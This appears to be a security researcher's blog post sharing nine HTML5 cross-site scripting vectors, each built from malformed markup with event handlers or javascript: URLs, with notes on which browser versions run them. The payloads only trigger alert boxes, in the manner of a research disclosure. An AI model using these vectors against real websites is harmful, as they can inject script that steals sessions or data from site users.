I'd like to share some (new??!.. I don't think so :P) XSS vectors. I found them playing with html5...
For info: references.
[# 4,6,7,8 need user interaction]
1. <b><img src=[]"</b><img src=x onerror=alert(1)//">2. <iframe onload='[/$/]+alert(2)++'></iframe>3. <link rel="stylesheet" href="javascript:alert(3)" /> <!-- Opera Mobile -->4. <b><a href=[]"</b><a href="javascript:alert(4)//">click me</a>5. <img/S/src="x"&&&&&[/$/]+[]///**/onerror='alert(5)+[]'-->6. <font color=< onclick=alert(6)///<> click me </font>7. <b><font color==[=_{}_=]"< <font onclick=alert(7)> click me </font>8. <keygen " ^{wtf{}((/ // onclick=al\u0065\u0072t(8)>9. <body text=|_| background=javascript:<><script>alert(9)</script>
Firefox 3.6.6: # 1 2 4 5 6 7 8 9
Opera 10.60: # 1 2 4 5 6 7 8 [1, 5 return 2 alert windows!]
Chrome 5.0.375.99: # 1 4 6 7 8 9
Opera Mobile 10: # 1 2 3 4 5 6 7 8 9 [1, 5 return 2 alert windows!]
References:
- HTML5 Security Cheatsheet
- Hackvertor
LATEST ENTRIES
- HTML5 xss vectors
- Computer threats: cool statistics
- php l0gg3r 0.2.2: a very simple php logger
- Mobile Web: Privacy Keeping and Exploitation Methods (on Hakin9 2010-02)
- Möbius strip
- [java] NetS3nd [easy] Client - client to send messages over windows NT/2000 networks
- Merry Xmas!!
- touchscreen_gesture.c (for Openmoko NeoFreerunner)
Replies: 0
Leave a Reply